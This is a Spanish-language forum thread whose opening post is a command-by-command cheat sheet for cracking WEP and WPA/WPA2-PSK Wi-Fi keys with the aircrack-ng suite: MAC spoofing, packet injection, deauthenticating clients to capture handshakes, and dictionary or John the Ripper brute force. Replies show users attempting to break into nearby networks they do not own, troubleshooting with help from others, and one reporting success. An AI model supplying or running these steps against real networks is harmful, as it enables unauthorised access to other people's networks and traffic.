Crackear WEP´s - WPA/WPA2/PSK [Resumen de Codigos]

Iniciado por ANTRAX, Marzo 27, 2011, 03:41:00 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 27, 2011, 03:41:00 AM Ultima modificación: Octubre 13, 2014, 03:26:57 PM por CloudswX
1. WEP`s:

NOTA: En todos los casos reemplazar:
XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: ESSID


1.1. Cambiar la MAC:

A. airmon-ng (Ver la interface que usamos)
B. airmon-ng stop XXXX (Detenemos el modo monitor)
C. ifconfig XXXX down (Tiramos nuestra interface)
D. macchanger --mac 00:11:22:33:44:55 XXXX (Cambiamos nuestra MAC, en este caso sera 00:11:22:33:44:55)
E. airmon-ng start XXXX (Volvemos a iniciar el modo monitor)



1.2. Buscar Redes:

F. airodump-ng XXXX ( Scannea Redes)
G. CTRL + C (Detiene el scanneo)
H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXXX (Capturamos #DATAs) [No cerrar consola]



1.3. Asociandonos a la red (En otra consola):

I. aireplay-ng -1 0 -a YYYY -h 00:11:22:33:44:55 -e RRR XXXX (Asociacion con la red)



1.4 Inyectando Trafico:

J. aireplay-ng -3 -b YYYY -h 00:11:22:33:44:55 XXXX (Captura Datas a mas velocidad)



1.5. Desencriptando la Clave (En otra consola):

K. aircrack-ng datas-01.cap (Desencripta la clave con Aircrack)



2. WPA/WPA2/PSK:

NOTA: En todos los casos reemplazar:XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: Interface modo monitor
TTTT: Station



2.1. Colocar la interface en modo monitor

A. aimon-ng (Saber nuestra Interface)
B. airmon-ng start XXXX (Colocamos en modo monitor nuestra Interface)



2.2. Capturando el Handshake:

C. airodump-ng RRR (Scannea redes)
D. CTRL + C (Frena el scanneo)
E. airodump-ng RRR --channel 1 --bssid YYYY -w /tmp/wpa2 (Guardara los *.cap en el directorio que le indicamos)
F. aireplay-ng -0 1 -a YYYY -c TTTT RRR(Comenzara la captura del Handshake)



2.3 Obteniendo la Clave:

G.1. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b YYYY /tmp/wpa2*.cap (Saca la Pass por Diccionario)
G.2. /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b YYYY -w - /tmp/wpa2*.cap (Saca la Pass por Fuerza Bruta con John The Ripper)


Precioso el tuto amigo :D
Ya estoy obteniendo la calve :D

no estoy muy metido en esto
por esto pregunto si este metodo vale para
windows 7  ultimate???

gracias de antemano.


holas yo tengo una pregunta referente a las claves wpa en el momento tengo una red con cifrado wpa tengo una tarjeta alfa de 1000w y tengo el backtrack 5 he estado utilizando el programa gerix que viene con el backtrack 5 logro hacer que se produsca el abrazo o el handske pero no logro decifrar la clave alguien me podria ayudar o recomendar algo para descifrar la clave de dicha red teniendo encuenta que en el momento solo cuento con las herramientas que mencione anteriormente y pues necesito internet ya que donde estoy el internet del modem de comcel es pesimo casi ni puedo entrar a la comu les agradesco muchisimo ;)

saludos a todos los presentes ok esto de la desencriptacion de las wpa/wpa2 wpa-psk es la misma mierda solo se nesecita que el cliente asocie sus datos en la conecion al router te recomiendo estudies primero la arquitectura del router y el operador de estos en tu pais ya que estos manejan posibles clavez ya sea alfa , alfa numericas , simplemente numericas puedes interastuar con otras aplicaciones tales como jhon the ripper LA VERDAD no puedo sacar caracteres en mi blackberry o si le daba ejenplos
el mundo es una variable facil inicias facil terminas

=_=

Buen trabajo antrax!!
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Gracias Necesito un poco mas de información para claves wpa2

Hola ANTRAX querias que te prguntara, pues ahora necesito que me ayudes u orientes respecto a una red wiffi es wpa2 psk, al parecer tiene activado el wps, lo escaneo con Wireshark y me parece ser proveedor microsoft. Eh probado este tutorial pero al momento de dar el diccionario .cap me intenta cargar pero de ahi no paso. de aqui /tmp/wpa2*.cap, ese wpa2 es carpeta? y el *.cap es el archivo cierto.
Disculpa soy novato aqui  en este tema, no eh podido desencripar esa red.
System32
XD
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Esto te va a despejar todas tus dudas:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

este resumen de codigos es un extracto de ese tutorial

Saludos!


Bueno me lo bajo para leerlo alrato y practicarle.
Saludos y gracias hermano :D
System32
XD
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


yo tengo una duda, que pasa en wpa y wpa2 cuando recibis la mac pero no hay station( perdon por la duda soy nuevo en esto y estoy intentando aprender) segun lei, es porque no hay cliente asociado a esa mac, eso que significa? no hay usuario en ese momento generando data?
como hacer en un caso asi? puede ser que se puedan inyectar datos para generar station?

saludos!

Si no hay, quiere decir que no hay ningun cliente conectado solo te queda esperar que exista alguno para desautenticarlo

Regards,
Snifer
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Hola a todos, soy nuevo en esto de romper redes wifi, he estado intentando romper las wep que tengo en mi zona, pero me he quedado en la parte:

H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXXX (Capturamos #DATAs) [No cerrar consola]

y es que no entiendo que va en la parte datas, ya que cuando le doy enter me sale un error y ahi me quedo  :( a ver si alguien me puede decir que debo colocar donde dice data ya que al poner lo mismo no me sale nada y solo da como error, espero me puedan ayudar gracias y buen aporte aunque no me funcione  ;D

DATA puede ser cualquier nombre que tu le des ya que es donde se almacenare los paquetes que estas capturando seria bueno que muestres el proceso que estas realizando para poder colaborarte

Regards,
Snifer
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Julio 10, 2013, 07:10:44 PM #16 Ultima modificación: Julio 12, 2013, 07:55:55 PM por joechmen
gracias por la respuesta, ahora estoy actualizando el kali linux, mañana intentare de nuevo y dare mas detalles para ver que puedo estar haciendo mal.

.................

Disculpen que escriba aca mismo pero es para agradecerles por la atención, me estaba equivocando en el bssid y por eso no me salia, ahora que lo intente de nuevo pude obtener el acceso pero claro con la WPS encendida si no, no pasa nada, gracias nuevamente.

saludos.

Abril 02, 2014, 01:15:32 AM #17 Ultima modificación: Abril 03, 2014, 01:45:13 PM por Snake0.0
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si no hay, quiere decir que no hay ningun cliente conectado solo te queda esperar que exista alguno para desautenticarlo

Regards,
Snifer

Si hay una manera Fijate en este video No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  te enseña que podes falsificar usuario

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Backtrack es Linux!

Y Desde Kali Linux Como Seria Con fuerza bruta ?

Igual!
Solo fijate en que directorio esta el jtr y listo

Saludos!
ANTRAX